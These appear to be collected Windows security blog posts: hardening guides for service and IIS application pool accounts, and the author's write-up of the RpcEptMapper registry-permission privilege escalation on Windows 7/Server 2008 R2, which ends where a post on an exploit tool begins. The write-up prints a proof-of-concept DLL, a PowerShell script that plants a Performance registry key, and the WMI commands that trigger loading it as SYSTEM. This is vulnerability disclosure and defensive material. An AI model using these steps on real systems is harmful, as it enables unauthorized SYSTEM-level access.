Windows service accounts are one of the preferred attack surfaces for privilege escalation. If you are able to compromise such an account, it is quite easy to get the highest privileges, mainly due to the powerful impersonation privileges that are granted by default to services by the operating system.

Even if Microsoft introduced WSH (Windows Service Hardening), there isn’t much you can do to “lower” the power of standard Windows services, but if you need to build or deploy a third-party service you can definitely strengthen it by using WSH.

In this post I will show you some useful tips.

Make use of Virtual accounts

Obviously a service must run under a specific account. There are some built-in Windows accounts like SYSTEM (oh no!!), Local Service, and Network Service. But there is also the ability to use Virtual Accounts (I won’t write about “Group Managed Service Accounts” in this post), which are self-managed (no need to deal with passwords) and to which you can grant specific permissions by setting the correct ACLs on the resources. This allows you to isolate the service: in case of compromise, it can only access the resources you have allowed. Virtual accounts can also access network resources, but in this case they will impersonate the computer account (COMPUTERNAME$).

Configuring Services with Virtual Accounts

First of all, you don’t need to create virtual service accounts: when the service is installed, a matching account is automatically created for you in the form:

NT SERVICE\<service name>

All you need to do is assign the account to your service:

Don’t forget to leave the password field blank!

Restricting access to Virtual Accounts

Now that your service runs under a specific account and not a generic one like Local Service or Network Service, you can implement fine-grained access control on resources like files and directories:

Removing unnecessary privileges

Impersonation privileges are a nightmare, so if your service doesn’t need to impersonate, why should we grant them to the service account?

Is it possible to remove this default privilege? There is good news: yes! We can configure the privileges directly in the registry or by using the “sc.exe” command:

And these values will be written into the registry:

Let’s see if the privilege is removed:

Oh yes! The dangerous privilege has been removed and it’s no longer possible to get it back, for example by using @itm4n’s trick described in this great post.

Write Restricted Token

If you add this extra group to your service tokens, you can further limit the permissions of your service account.

This means that by default you can only read or execute resources unless you explicitly grant write access:

A great research about write restricted tokens can be found in Forshaw’s post

Conclusions

I hope this very short post can be useful for those of us who must secure our Windows systems (offensive sec is just a joke for me 🙂).

In the next post I will show you how to remove impersonation privileges in other critical services… stay tuned

UPDATE

Following Forshaw’s recent blog post and hint, and his post on “Sharing a Logon Session a Little Too Much”, I can confirm that you can gain back your privileges with the “loopback pipe trick”. This is possible because you will get the original token stored in LSASS, whose privileges have not been stripped by the Service Control Manager. So is the only solution to prevent this to associate a write-restricted token with your service?

Well not exactly … -> https://bugs.chromium.org/p/project-zero/issues/detail?id=2194

The use of WRITE RESTRICTED is considered by Microsoft to be of primary use for mitigating ambient privilege attacks 😦

That’s all 😉

Windows RpcEptMapper Service Insecure Registry Permissions EoP

If you follow me on Twitter, you probably know that I developed my own Windows privilege escalation enumeration script - PrivescCheck - which is a sort of updated and extended version of the famous PowerUp. If you have ever run this script on Windows 7 or Windows Server 2008 R2, you probably noticed a weird recurring result and perhaps thought that it was a false positive just as I did. Or perhaps you’re reading this and you have no idea what I am talking about. Anyway, the only thing you should know is that this script actually did spot a Windows 0-day privilege escalation vulnerability. Here is the story behind this finding…

A Bit of Context…

At the beginning of this year, I started working on a privilege escalation enumeration script: PrivescCheck. The idea was to build on the work that had already been accomplished with the famous PowerUp tool and implement a few more checks that I found relevant. With this script, I simply wanted to be able to quickly enumerate potential vulnerabilities caused by system misconfigurations, but it actually yielded some unexpected results. Indeed, it enabled me to find a 0-day vulnerability in Windows 7 / Server 2008 R2!

Given a fully patched Windows machine, one of the main security issues that can lead to local privilege escalation is service misconfiguration. If a normal user is able to modify an existing service then he/she can execute arbitrary code in the context of LOCAL/NETWORK SERVICE or even LOCAL SYSTEM. Here are the most common vulnerabilities. There is nothing new so you can skip this part if you are already familiar with these concepts.

  • Service Control Manager (SCM) - Low-privileged users can be granted specific permissions on a service through the SCM. For example, a normal user can start the Windows Update service with the command sc.exe start wuauserv thanks to the SERVICE_START permission. This is a very common scenario. However, if this same user had SERVICE_CHANGE_CONFIG, he/she would be able to alter the behavior of that service and make it run an arbitrary executable.

  • Binary permissions - A typical Windows service usually has a command line associated with it. If you can modify the corresponding executable (or if you have write permissions in the parent folder) then you can basically execute whatever you want in the security context of that service.

  • Unquoted paths - This issue is related to the way Windows parses command lines. Let’s consider a fictitious service with the following command line: C:\Applications\Custom Service\service.exe /v. This command line is ambiguous so Windows would first try to execute C:\Applications\Custom.exe with Service\service.exe as the first argument (and /v as the second argument). If a normal user had write permissions in C:\Applications then he/she could hijack the service by copying a malicious executable to C:\Applications\Custom.exe. That’s why paths should always be surrounded by quotes, especially when they contain spaces: "C:\Applications\Custom Service\service.exe" /v

  • Phantom DLL hijacking (and writable %PATH% folders) - Even on a default installation of Windows, some built-in services try to load DLLs that don’t exist. That’s not a vulnerability per se but if one of the folders that are listed in the %PATH% environment variable is writable by a normal user then these services can be hijacked.

Each one of these potential security issues already had a corresponding check in PowerUp but there is another case where misconfiguration may arise: the registry. Usually, when you create a service, you do so by invoking the Service Control Manager using the built-in command sc.exe as an administrator. This will create a subkey with the name of your service in HKLM\SYSTEM\CurrentControlSet\Services and all the settings (command line, user, etc.) will be saved in this subkey. So, if these settings are managed by the SCM, they should be secure by default. At least that’s what I thought…

Checking Registry Permissions

One of the core functions of PowerUp is Get-ModifiablePath. The basic idea behind this function is to provide a generic way to check whether the current user can modify a file or a folder in any way (e.g.: AppendData/AddSubdirectory). It does so by parsing the ACL of the target object and then comparing it to the permissions that are given to the current user account through all the groups it belongs to. Although this principle was originally implemented for files and folders, registry keys are securable objects too. Therefore, it’s possible to implement a similar function to check if the current user has any write permissions on a registry key. That’s exactly what I did and I thus added a new core function: Get-ModifiableRegistryPath.

Then, implementing a check for modifiable registry keys corresponding to Windows services is as easy as calling the Get-ChildItem PowerShell command on the path Registry::HKLM\SYSTEM\CurrentControlSet\Services. The result can simply be piped to the new Get-ModifiableRegistryPath command, and that’s all.

When I need to implement a new check, I use a Windows 10 machine, and I also use the same machine for the initial testing to see if everything is working as expected. When the code is stable, I extend the tests to a few other Windows VMs to make sure that it’s still PowerShell v2 compatible and that it can still run on older systems. The operating systems I use the most for that purpose are Windows 7, Windows 2008 R2 and Windows Server 2012 R2.

When I ran the updated script on a default installation of Windows 10, it didn’t return anything, which was the result I expected. But then, I ran it on Windows 7 and I saw this:

Since I didn’t expect the script to yield any result, I first thought that these were false positives and that I had messed up at some point in the implementation. But, before getting back to the code, I did take a closer look at these results…

A False Positive?

According to the output of the script, the current user has some write permissions on two registry keys:

  • HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
  • HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper

Let’s manually check the permissions of the RpcEptMapper service using the regedit GUI. One thing I really like about the Advanced Security Settings window is the Effective Permissions tab. You can pick any user or group name and immediately see the effective permissions that are granted to this principal without the need to inspect all the ACEs separately. The following screenshot shows the result for the low privileged lab-user account.

Most permissions are standard (e.g.: Query Value) but one in particular stands out: Create Subkey. The generic name corresponding to this permission is AppendData/AddSubdirectory, which is exactly what was reported by the script:

Name              : RpcEptMapper
ImagePath         : C:\Windows\system32\svchost.exe -k RPCSS
User              : NT AUTHORITY\NetworkService
ModifiablePath    : {Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcEptMapper}
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {ReadControl, AppendData/AddSubdirectory, ReadData/ListDirectory}
Status            : Running
UserCanStart      : True
UserCanRestart    : False

Name              : RpcEptMapper
ImagePath         : C:\Windows\system32\svchost.exe -k RPCSS
User              : NT AUTHORITY\NetworkService
ModifiablePath    : {Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcEptMapper}
IdentityReference : BUILTIN\Users
Permissions       : {WriteExtendedAttributes, AppendData/AddSubdirectory, ReadData/ListDirectory}
Status            : Running
UserCanStart      : True
UserCanRestart    : False

What does this mean exactly? It means that we cannot just modify the ImagePath value for example. To do so, we would need the WriteData/AddFile permission. Instead, we can only create a new subkey.

Does it mean that it was indeed a false positive? Surely not. Let the fun begin!

RTFM

At this point, we know that we can create arbitrary subkeys under HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper but we cannot modify existing subkeys and values. These already existing subkeys are Parameters and Security, which are quite common for Windows services.

Therefore, the first question that came to mind was: is there any other predefined subkey - such as Parameters and Security- that we could leverage to effectively modify the configuration of the service and alter its behavior in any way?

To answer this question, my initial plan was to enumerate all existing keys and try to identify a pattern. The idea was to see which subkeys are meaningful for a service’s configuration. I started to think about how I could implement that in PowerShell and then sort the result. Though, before doing so, I wondered if this registry structure was already documented. So, I googled something like windows service configuration registry site:microsoft.com and here is the very first result that came out.

Looks promising, doesn’t it? At first glance, the documentation did not seem to be exhaustive and complete. Considering the title, I expected to see some sort of tree structure detailing all the subkeys and values defining a service’s configuration but it was clearly not there.

Still, I did take a quick look at each paragraph. And I quickly spotted the keywords “Performance” and “DLL”. Under the subtitle “Performance”, we can read the following:

Performance: A key that specifies information for optional performance monitoring. The values under this key specify the name of the driver’s performance DLL and the names of certain exported functions in that DLL. You can add value entries to this subkey using AddReg entries in the driver’s INF file.

According to this short paragraph, one can theoretically register a DLL in a driver service in order to monitor its performance thanks to the Performance subkey. OK, this is really interesting! This key doesn’t exist by default for the RpcEptMapper service, so it looks like it is exactly what we need. There is a slight problem though: this service is definitely not a driver service. Anyway, it’s still worth a try, but we need more information about this “Performance Monitoring” feature first.

Note: in Windows, each service has a given Type. A service type can be one of the following values: SERVICE_KERNEL_DRIVER (1), SERVICE_FILE_SYSTEM_DRIVER (2), SERVICE_ADAPTER (4), SERVICE_RECOGNIZER_DRIVER (8), SERVICE_WIN32_OWN_PROCESS (16), SERVICE_WIN32_SHARE_PROCESS (32) or SERVICE_INTERACTIVE_PROCESS (256).

After some googling, I found this resource in the documentation: Creating the Application’s Performance Key.

First, there is a nice tree structure that lists all the keys and values we have to create. Then, the description gives the following key information:

  • The Library value can contain a DLL name or a full path to a DLL.
  • The Open, Collect, and Close values allow you to specify the names of the functions that should be exported by the DLL.
  • The data type of these values is REG_SZ (or even REG_EXPAND_SZ for the Library value).

If you follow the links that are included in this resource, you’ll even find the prototype of these functions along with some code samples: Implementing OpenPerformanceData.

DWORD APIENTRY OpenPerfData(LPWSTR pContext);
DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned);
DWORD APIENTRY ClosePerfData();

I think that’s enough with the theory, it’s time to start writing some code!

Writing a Proof-of-Concept

Thanks to all the bits and pieces I was able to collect throughout the documentation, writing a simple Proof-of-Concept DLL should be pretty straightforward. But still, we need a plan!

When I need to exploit some sort of DLL hijacking vulnerability, I usually start with a simple and custom log helper function. The purpose of this function is to write some key information to a file whenever it’s invoked. Typically, I log the PID of the current process and the parent process, the name of the user that runs the process and the corresponding command line. I also log the name of the function that triggered this log event. This way, I know which part of the code was executed.

In my other articles, I always skipped the development part because I assumed that it was more or less obvious. But, I also want my blog posts to be beginner-friendly, so there is a contradiction. I will remedy this situation here by detailing the process. So, let’s fire up Visual Studio and create a new “C++ Console App” project. Note that I could have created a “Dynamic-Link Library (DLL)” project but I find it actually easier to just start with a console app.

Here is the initial code generated by Visual Studio:

#include <iostream>

int main()
{
    std::cout << "Hello World!\n";
}

Of course, that’s not what we want. We want to create a DLL, not an EXE, so we have to replace the main function with DllMain. You can find a skeleton code for this function in the documentation: Initialize a DLL.

#include <Windows.h>

extern "C" BOOL WINAPI DllMain(HINSTANCE const instance, DWORD const reason, LPVOID const reserved)
{
    switch (reason)
    {
    case DLL_PROCESS_ATTACH:
        Log(L"DllMain"); // See log helper function below
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

In parallel, we also need to change the settings of the project to specify that the output compiled file should be a DLL rather than an EXE. To do so, you can open the project properties and, in the “General” section, select “Dynamic Library (.dll)” as the “Configuration Type”. Right under the title bar, you can also select “All Configurations” and “All Platforms” so that this setting can be applied globally.

Next, I add my custom log helper function.

#include <Lmcons.h> // UNLEN + GetUserName
#include <tlhelp32.h> // CreateToolhelp32Snapshot()
#include <strsafe.h>

void Log(LPCWSTR pwszCallingFrom)
{
    LPWSTR pwszBuffer, pwszCommandLine;
    WCHAR wszUsername[UNLEN + 1] = { 0 };
    SYSTEMTIME st = { 0 };
    HANDLE hToolhelpSnapshot;
    PROCESSENTRY32 stProcessEntry = { 0 };
    DWORD dwPcbBuffer = UNLEN, dwBytesWritten = 0, dwProcessId = 0, dwParentProcessId = 0, dwBufSize = 0;
    BOOL bResult = FALSE;

    // Get the command line of the current process
    pwszCommandLine = GetCommandLine();

    // Get the name of the process owner
    GetUserName(wszUsername, &dwPcbBuffer);

    // Get the PID of the current process
    dwProcessId = GetCurrentProcessId();

    // Get the PID of the parent process
    hToolhelpSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    stProcessEntry.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hToolhelpSnapshot, &stProcessEntry)) {
        do {
            if (stProcessEntry.th32ProcessID == dwProcessId) {
                dwParentProcessId = stProcessEntry.th32ParentProcessID;
                break;
            }
        } while (Process32Next(hToolhelpSnapshot, &stProcessEntry));
    }
    CloseHandle(hToolhelpSnapshot);

    // Get the current date and time
    GetLocalTime(&st);

    // Prepare the output string and log the result
    dwBufSize = 4096 * sizeof(WCHAR);
    pwszBuffer = (LPWSTR)malloc(dwBufSize);
    if (pwszBuffer)
    {
        StringCchPrintf(pwszBuffer, dwBufSize, L"[%.2u:%.2u:%.2u] - PID=%d - PPID=%d - USER='%s' - CMD='%s' - METHOD='%s'\r\n",
            st.wHour,
            st.wMinute,
            st.wSecond,
            dwProcessId,
            dwParentProcessId,
            wszUsername,
            pwszCommandLine,
            pwszCallingFrom
        );

        LogToFile(L"C:\\LOGS\\RpcEptMapperPoc.log", pwszBuffer);

        free(pwszBuffer);
    }
}

Then, we can populate the DLL with the three functions we saw in the documentation. The documentation also states that they should return ERROR_SUCCESS if successful.

DWORD APIENTRY OpenPerfData(LPWSTR pContext)
{
    Log(L"OpenPerfData");
    return ERROR_SUCCESS;
}

DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned)
{
    Log(L"CollectPerfData");
    return ERROR_SUCCESS;
}

DWORD APIENTRY ClosePerfData()
{
    Log(L"ClosePerfData");
    return ERROR_SUCCESS;
}

Ok, so the project is now properly configured, DllMain is implemented, we have a log helper function and the three required functions. One last thing is missing though. If we compile this code, OpenPerfData, CollectPerfData and ClosePerfData will be available as internal functions only so we need to export them. This can be achieved in several ways. For example, you could create a DEF file and then configure the project appropriately. However, I prefer to use the __declspec(dllexport) keyword (doc), especially for a small project like this one. This way, we just have to declare the three functions at the beginning of the source code.

extern "C" __declspec(dllexport) DWORD APIENTRY OpenPerfData(LPWSTR pContext);
extern "C" __declspec(dllexport) DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned);
extern "C" __declspec(dllexport) DWORD APIENTRY ClosePerfData();

If you want to see the full code, I uploaded it here.

Finally, we can select Release/x64 and “Build the solution”. This will produce our DLL file: .\DllRpcEndpointMapperPoc\x64\Release\DllRpcEndpointMapperPoc.dll.

Testing the PoC

Before going any further, I always make sure that my payload is working properly by testing it separately. The little time spent here can save a lot of time afterwards by preventing you from going down a rabbit hole during a hypothetical debug phase. To do so, we can simply use rundll32.exe and pass the name of the DLL and the name of an exported function as the parameters.

C:\Users\lab-user\Downloads\>rundll32 DllRpcEndpointMapperPoc.dll,OpenPerfData

Great, the log file was created and, if we open it, we can see two entries. The first one was written when the DLL was loaded by rundll32.exe. The second one was written when OpenPerfData was called. Looks good! 🙂

[21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32  DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='DllMain'
[21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32  DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='OpenPerfData'

Ok, now we can focus on the actual vulnerability and start by creating the required registry key and values. We can either do this manually using reg.exe / regedit.exe or programmatically with a script. Since I already went through the manual steps during my initial research, I’ll show a cleaner way to do the same thing with a PowerShell script. Besides, creating registry keys and values in PowerShell is as easy as calling New-Item and New-ItemProperty, isn’t it? 🤔

Requested registry access is not allowed… Hmmm, ok… It looks like it won’t be that easy after all. 😛

I didn’t really investigate this issue but my guess is that when we call New-Item, powershell.exe actually tries to open the parent registry key with some flags that correspond to permissions we don’t have.

Anyway, if the built-in cmdlets don’t do the job, we can always go down one level and invoke DotNet functions directly. Indeed, registry keys can also be created with the following code in PowerShell.

[Microsoft.Win32.Registry]::LocalMachine.CreateSubKey("SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance")

Here we go! In the end, I put together the following script in order to create the appropriate key and values, wait for some user input and finally terminate by cleaning everything up.

$ServiceKey = "SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance"

Write-Host "[*] Create 'Performance' subkey"
[void] [Microsoft.Win32.Registry]::LocalMachine.CreateSubKey($ServiceKey)
Write-Host "[*] Create 'Library' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Library" -Value "$($pwd)\DllRpcEndpointMapperPoc.dll" -PropertyType "String" -Force | Out-Null
Write-Host "[*] Create 'Open' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Open" -Value "OpenPerfData" -PropertyType "String" -Force | Out-Null
Write-Host "[*] Create 'Collect' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Collect" -Value "CollectPerfData" -PropertyType "String" -Force | Out-Null
Write-Host "[*] Create 'Close' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Value "ClosePerfData" -PropertyType "String" -Force | Out-Null

Read-Host -Prompt "Press any key to continue"

Write-Host "[*] Cleanup"
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Library" -Force
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Open" -Force
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Collect" -Force
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Force
[Microsoft.Win32.Registry]::LocalMachine.DeleteSubKey($ServiceKey)

The last step now: how do we trick the RPC Endpoint Mapper service into loading our Performance DLL? Unfortunately, I haven’t kept track of all the different things I tried. It would have been really interesting in the context of this blog post to highlight how tedious and time-consuming research can sometimes be. Anyway, one thing I found along the way is that you can query Performance Counters using WMI (Windows Management Instrumentation), which isn’t too surprising after all. More info here: WMI Performance Counter Types.

Counter types appear as the CounterType qualifier for properties in Win32_PerfRawData classes, and as the CookingType qualifier for properties in Win32_PerfFormattedData classes.

So, I first enumerated the WMI classes that are related to Performance Data in PowerShell using the following command.

Get-WmiObject -List | Where-Object { $_.Name -Like "Win32_Perf*" }

And, I saw that my log file was created almost right away! Here is the content of the file.

[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='DllMain'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='OpenPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'

I expected to get arbitrary code execution as NETWORK SERVICE in the context of the RpcEptMapper service at most but, it looks like I got a much better result than anticipated. I actually got arbitrary code execution in the context of the WMI service itself, which runs as LOCAL SYSTEM. How amazing is that?! :sunglasses:

Note: if I had got arbitrary code execution as NETWORK SERVICE, I would have been just a token away from the LOCAL SYSTEM account thanks to the trick that was demonstrated by James Forshaw a few months ago in this blog post: Sharing a Logon Session a Little Too Much.

I also tried to query each WMI class separately and I observed the exact same result.

Get-WmiObject Win32_Perf
Get-WmiObject Win32_PerfRawData
Get-WmiObject Win32_PerfFormattedData

Conclusion

I don’t know how this vulnerability has gone unnoticed for so long. One explanation is that other tools probably looked for full write access in the registry, whereas AppendData/AddSubdirectory was actually enough in this case. Regarding the “misconfiguration” itself, I would assume that the registry key was set this way for a specific purpose, although I can’t think of a concrete scenario in which users would have any kind of permissions to modify a service’s configuration.

I decided to write about this vulnerability publicly for two reasons. The first one is that I actually made it public - without initially realizing it - the day I updated my PrivescCheck script with the GetModifiableRegistryPath function, which was several months ago. The second one is that the impact is low. It requires local access and affects only old versions of Windows that are no longer supported (unless you have purchased the Extended Support…). At this point, if you are still using Windows 7 / Server 2008 R2 without isolating these machines properly in the network first, then preventing an attacker from getting SYSTEM privileges is probably the least of your worries.

Apart from the anecdotal side of this privilege escalation vulnerability, I think that this “Performance” registry setting opens up really interesting opportunities for post-exploitation, lateral movement and AV/EDR evasion. I already have a few particular scenarios in mind but I haven’t tested any of them yet. To be continued?…


Hands off my IIS accounts!

As promised in my previous post, I will (hopefully) give you some advice on how to harden the IIS “Application Pool” accounts, aka “identities”.

First of all, we need to understand how the IIS architecture works and how identities are managed. Therefore, I suggest you read some specific posts about this topic, for example this one and this one. More about identities can be found here.

Ok! Now that you have all the details, let’s start with the IIS worker process “w3wp”. This is the process which will actually access the HTTP resources we ask for and serve them. By default, this process runs under the “ApplicationPoolIdentity” identity. This is nothing more than a “Virtual Account” (in this case, the default one) with the name of the Application Pool, which IIS creates for us. Virtual accounts are managed directly by the OS, so you don’t need to set passwords.

We can create dedicated Application Pools and assign them to web sites. Given that every application pool then has its own Virtual Account, we can secure access to resources based on the single application pool identity.

This is really cool: we are able to define our own security boundaries.

Let’s take a closer look at the process:

We can observe that the AppPool identity is a member of the built-in “IIS_IUSRS” group and also the “SERVICE” group. Unfortunately, it also has 2 dangerous privileges: SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege, probably the most abused privileges for escalations when you are able to get code execution on a buggy web application (in the following screenshot we uploaded a webshell), do you agree?

I think that everyone who is responsible for securing IIS Web Applications would like to limit these privileges, especially if they aren’t needed. In fact, the impersonation privileges are only useful if IIS needs to impersonate the Windows user who accessed the web app (<identity impersonate="true"/>), otherwise who cares?

So the first question is: is it safe to remove the privileges in this context?

There is no official documentation from MS about this, but there is no reason why it should lead to problems as long as you don’t need to impersonate.

Now let’s see how privileges are configured.

We need to launch the Policy editor “gpedit.msc” and go to:

Computer Configuration->Windows Settings->Security Settings->Local Policies->User Rights Assignment

This is the configuration for the “Impersonate a client after Authentication” (SeImpersonatePrivilege):

Bad news: the IIS_IUSRS and SERVICE groups have this privilege by default, and the Application Pool Identities belong to these groups.

For the “Replace a process level token” (SeAssignPrimaryTokenPrivilege) we have:

Again, our Application Pool Identities and the SERVICE group have this privilege.

We could indeed inhibit the automatic membership in the “IIS_IUSRS” group by modifying the appropriate XML file following MS official documentation (side note: I was not able to perform this action, I always got an HTTP 503 error if set to “true”):

But this would not solve our problem, given that the Application Pool Identities belong to the SERVICE group by default and we cannot remove this group from the Application Pool. Moreover, we cannot remove the impersonation privileges from the SERVICE group.

So what can we do?

First of all, we have to forget 😦 the Virtual Accounts and assign a “real” Windows account to our Application Pool (just a standard user with a very strong password, set to “never expires”).
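This can be done in the IIS Manager GUI, or scripted with appcmd. Here is a sketch, where the pool name, user name and password are placeholders you would adapt:

```shell
REM Assign a dedicated Windows account to an Application Pool.
REM "MyAppPool", "web" and the password below are placeholders.
%systemroot%\system32\inetsrv\appcmd.exe set apppool "MyAppPool" ^
  /processModel.identityType:SpecificUser ^
  /processModel.userName:"web" ^
  /processModel.password:"<VeryStrongPassword>"
```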

Let’s see the result:

The user (web) is no longer a member of the SERVICE group, which is a good starting point.

It is still a member of IIS_IUSRS and IIS APPPOOL\MyAppPool, so in order to remove our unwanted privileges, in the Group Policy Editor we have to:

  • Remove IIS_IUSRS from “Impersonate a Client after Authentication”
  • Remove IIS APPPOOL\MyAppPool from “Replace a process level token”
  • Restart the IIS services and observe the result.

Yes! The privileges are no longer present, which is confirmed by listing the w3wp process tokens:

Now we can be more comfortable given that we have secured these accounts, can’t we? Well… not exactly… there are still a lot of nasty things you can do in session 0… more about this maybe in a future post 😉

An Unconventional Exploit for the RpcEptMapper Registry Key Vulnerability

A few days ago, I released Perfusion, an exploit tool for the RpcEptMapper registry key vulnerability that I discussed in my previous post. Here, I want to discuss the strategy I opted for when I developed the exploit. Although it is not as technical as a memory corruption exploit, I still learned a few tricks that I wanted to share.

In the Previous Episode…

Before we begin, here is a brief summary of my last blog post. On Windows 7 / Server 2008 R2, two service registry keys are configured with weak permissions: RpcEptMapper and DnsCache. Basically, these permissions provide a regular user with the ability to create subkeys. This issue is pretty simple to leverage. One just has to create a Performance key and populate it with a few values, among which is the absolute path of a Performance DLL. In order for this DLL to be loaded by a privileged user, one just has to query the Performance counters of the machine (by invoking Get-WmiObject Win32_Perf in PowerShell for example). When doing so, the WMI service should load the DLL as NT AUTHORITY\SYSTEM and execute three predefined functions that must be exported by the library (and that are also configured in the Performance registry key).

WMI and the Performance Counters

The documentation states that “Windows Performance Counters provide a high-level abstraction layer that provides a consistent interface for collecting various kinds of system data such as CPU, memory, and disk usage”. Further, in the About section, you can read that there are four main ways to use Performance counters, and one of them is through the WMI Performance Counter Classes. This is more or less how I found out that you could query these counters with Get-WmiObject Win32_Perf in PowerShell. This type of interaction is potentially very interesting because it involves a very common type of IPC (Inter-Process Communication) on Windows, which is RPC (Remote Procedure Call), or more precisely DCOM (Distributed Component Object Model) in this case (DCOM works on top of RPC). Such a mechanism is especially required when a low-privileged process needs to interact with a more privileged one, such as the WMI service in our case.

This explains why, as a regular user, we were able to force the WMI service to load our DLL. However, this type of trigger is a double-edged sword. Indeed, when I initially worked on the Proof-of-Concept, I noticed that, on rare occasions, the DLL would not be loaded as NT AUTHORITY\SYSTEM and the exploit would thus fail. Why is that? The answer is: “impersonation”.

When interacting with another process, especially if it is a privileged service, impersonation is very common. To understand why it is so important, you have to keep in mind that, whenever you invoke a Remote Procedure Call, you literally ask another process to execute some code and, often, using parameters that are under your control. If you are able to force a service to do things such as move an arbitrary file to an arbitrary location as NT AUTHORITY\SYSTEM for example, this can have nasty consequences. To solve this problem, the Windows API provides almost as many impersonation functions as there are IPC mechanisms. For instance, you can invoke ImpersonateNamedPipeClient as a named pipe server or RpcImpersonateClient as an RPC server.

In the case of the Performance counters, when you instantiate the remote class Win32_Perf, I observed that the WMI service sometimes creates a dedicated wmiprvse.exe process that runs as NT AUTHORITY\LOCAL SERVICE. In this case, it always impersonates the client, as illustrated on the screenshot below.

Honestly, I haven’t spent any time trying to figure out why the service would sometimes load the DLL as LOCAL SERVICE, or as SYSTEM on other occasions. What I observed though is that, if you wait long enough and then try again, the DLL would be loaded as SYSTEM. This was enough for me because I didn’t want to spend too much time on this as I have other (more interesting) projects I want to work on. Therefore, in the rest of this article, we will just consider that we have the ability to load our DLL in the context of NT AUTHORITY\SYSTEM.

Exploit Development

The idea is to build a standalone exploit. In other words, as a pentester, I want to be able to drop a simple executable on a vulnerable machine and just execute it to get a SYSTEM shell, without having to configure the registry manually or compile a DLL every time.

Now, in order to define a proper strategy to get there, we need to list the starting conditions. First, we know that a machine reboot is not required. We already know that the DLL loading can be triggered through the instantiation of a WMI class. This is very easy to do with a high-level script engine such as PowerShell but doing the same thing in C/C++ will probably require a bit of work. Then, we know that, although we modify the configuration of the RpcEptMapper (or DnsCache) service, the DLL is actually loaded by the WMI service. We will see why this is important in a moment. Last but not least, we want to be able to get a SYSTEM shell in our console but the DLL is actually loaded by a service in a totally different session, so we will have to find a way to solve this problem.

Instantiate a WMI Class in C/C++

I really want to emphasize that, when you use a command such as Get-WmiObject Win32_Perf in PowerShell, there is a loooooot of stuff going on under the hood. These cmdlets are extremely powerful and make the life of system administrators and developers a lot easier. Unless you have at least tried to develop a client program for a DCOM interface in C/C++, you cannot really realize that. Fortunately, the documentation provided by Microsoft is pretty good and contains several detailed examples. They even provide a complete code snippet. In order to help you realize what I’ve just said, you should just know that this sample code is written in more than 250 lines of C/C++ and that the only thing it does is query a single counter, whereas Get-WmiObject Win32_Perf actually collects all the available counters. To me, this is really mind-blowing!

In the end, here is a completely stripped-down version of the code I eventually came up with to trigger the DLL loading within the WMI service.

CoInitializeEx(NULL, COINIT_MULTITHREADED);
